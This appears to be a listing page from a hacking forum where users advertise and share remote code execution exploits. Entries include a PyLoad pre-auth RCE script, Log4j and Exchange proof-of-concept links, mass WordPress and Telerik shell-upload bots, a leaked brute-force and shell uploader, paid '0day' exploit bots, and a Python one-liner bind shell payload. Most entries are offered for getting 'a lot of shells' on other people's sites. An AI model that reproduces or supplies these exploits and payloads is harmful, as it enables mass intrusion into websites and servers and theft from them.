Welcome To Crax.Pro Forum!

Check our new Marketplace at Crax.Shop

   Login! SignUp Now!
  1. coolrebell

    Visual Studio 1-click RCE

    A New Exploitation Technique for Visual Studio Projects Using code projects for phishing attacks is not a new concept. In early 2021, the Lazarus APT group employed a specific attack technique in their campaign targeting security researchers. They embedded malicious event commands within Visual...
  2. coolrebell

    CVE-2023-36745: Microsoft Exchange Server RCE

    https://securityonline.info/microsoft-exchange-server-rce-cve-2023-36745-flaw-gets-poc-exploit/ PoC: https://github.com/N1k0la-T/CVE-2023-36745
  3. resdonet

    PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)

    CVE-2023-0297 import requests, argparse parser = argparse.ArgumentParser() parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.') parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.') arguments = parser.parse_args()...
  4. R

    Bug  Microsoft Office 365 Version 18.2305.1222.0 - Elevation of Privilege + RCE

    - Exploit Server: *** Hidden text: You do not have sufficient rights to view the hidden text. Visit the forum thread! ***
  5. zero-day

    Checker Bot  0Day 1.0.0.9 RCE Python Bot

    Hi guys New Update for 0day RCE 1.0.0.8 This tools have over 50 private Tools - Crack SMTP using RCE - Grab SMS Config - OTP SMS Pro - GSM phone Number Validater and more... Download from Official repository https://github.com/bnpp-web/0day/
  6. F0rS3c

    Mastering Payloads for Web Application Security

    As a bug bounty hunter, you must be aware of different types of payloads that you can use to test the vulnerabilities of web applications. Among these, XSS, LFI, REC, and SQL injection are the most commonly used payloads. In this blog, we will discuss 4 different payloads that can be used for...
  7. formetutor

    Multi/Others  Drupal Valid RCE Vuln Scanner

    ADD AN IMAGE HERE! [Not adding an image will result in removal] Then remove these lines. Download: Drupal Valid 100% Vuln RCE Scanner Open source also avalaible at : https://github.com/t101804/DrupalRep Dont forget follow and star repo *** Hidden text: You do not have sufficient rights to...
  8. kozisis

    Mail Brute Brute Proxy Multi/Others  Pegasus V2 - Original File - Leaked From kozoss12

    Feature & Detail : Free Method Get List! Latest WordPress RCE Get WebShell Everyday Auto Send Request List Support BIG List Fresh Result Cracked Auto Make Hidden Dir Auto Filtering Good Web Auto bypass Upload .py Version Support All WinVersion Anti Detected Uploader Auto Connect...
  9. CodeBoss

    Script/Site Shell WP  Wordpress Augmented-Reality Plugin RCE [Unauthenticated]

    Hello Guys, New Exploit For Uploading Shells in [Augmented-Reality Plugin] Very Fast Added Some Famous Vulnerability Backdoors In This Plugin For Getting More Shells. VirusToTal Result : https://virustotal.com/gui/file/869045277d13a3f3abb05840d3e2a4bae785cd7894747e34a0a8473ec556794a...
  10. CodeBoss

    Bot  Mass Telerik Bot {RCE} V1

    We Release Our New Bot { Mass Telerik Bot RCE v1 } Priv8 + Free Coded By CodeBoss VirusTotal - https://www.virustotal.com/gui/file/798cd58c13232332d86ac60d2054521a73c9a30dbb918ac8051b99ff9dc277cd Link Download - https://www.mediafire.com/file/snggsvqb879q9se/Mass-Telerik.zip/file For Any...
  11. throvinus15

    Paid WP CP/Shell Priv8 Bot 0day WP New Exploit RCE 2022 2022-04-12

    🔥 Priv8 Bot 0day WP New Exploit RCE 2022🔥 New Exploit Wordpress RCE 2022🔥 💥 Have many fresh Priv8 RCE Exploit 💥 Can Get a Lot Shell everdays🔥 💥 No need: key, hwid, limit ip 💥 Only need password + sitelist => a lot Shells🔥 💥 Can use in unlimited RDP 💥Legit and Fast⚡ more info? @Throvinus...
  12. BIBIL

    Paid Config  Free | Alfa Rce Exploit by 0Day team

    BIBIL submitted a new resource: Free | Alfa Rce Exploit by 0Day team - AlfaRce Read more about this resource...
  13. pwncore

    Log4j RCE Auto Scanner CVE-2021-44228

    Features Support for lists of URLs. Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools). Fuzzing for HTTP POST Data parameters. Fuzzing for JSON data parameters. Supports DNS callback for vulnerability discovery and validation. WAF Bypass payloads...
  14. pwncore

    0day Log4j RCE Vulnerability ! ( 2021-44228 )

    New 0day RCE vuln, the whole world is affected check this out: https://t.me/vPwndCom/7703 POC: https://github.com/PwnC00re/Log4J_0day_RCE Join us : t.me/vPwnd
  15. Tobi

    Bot  All Tools In One

    TOOLS 🔍 DRUPAL HUNTER EXPLOITATION TOOL 🔍 # --= https://github.com/dr-iman/Drupal-Hunter ⏰ CMS DETECTOR v2 (WP, DUPAL, JOOMLA) ⏰ # --= https://github.com/dr-iman/cms-detector 🧙 WORDPRESS DETECTOR (VULN DORKER) 🧙 # --= https://github.com/dr-iman/Wordpress-detector 📑 PACKET STORM EXPLOIT LIST 📑 #...
  16. Zayn1001

    BIN  python bind shell single line code for both Unix and Windows, used to finding and exploit RCE (ImageMagick, Ghostscript,

    Python one-liner bind shell [Payload] Note: Shell supports 'cd' command.(edited) [01:58] Payloads: [02:01] Unix: python -c "(lambda __g, __y, __contextlib: [[[[(s.bind(('0.0.0.0', 4242)), (s.listen(5), [(lambda __after: [[[(lambda __after: [__after() for __g['u'] in [('system32')]][0]...
Top Bottom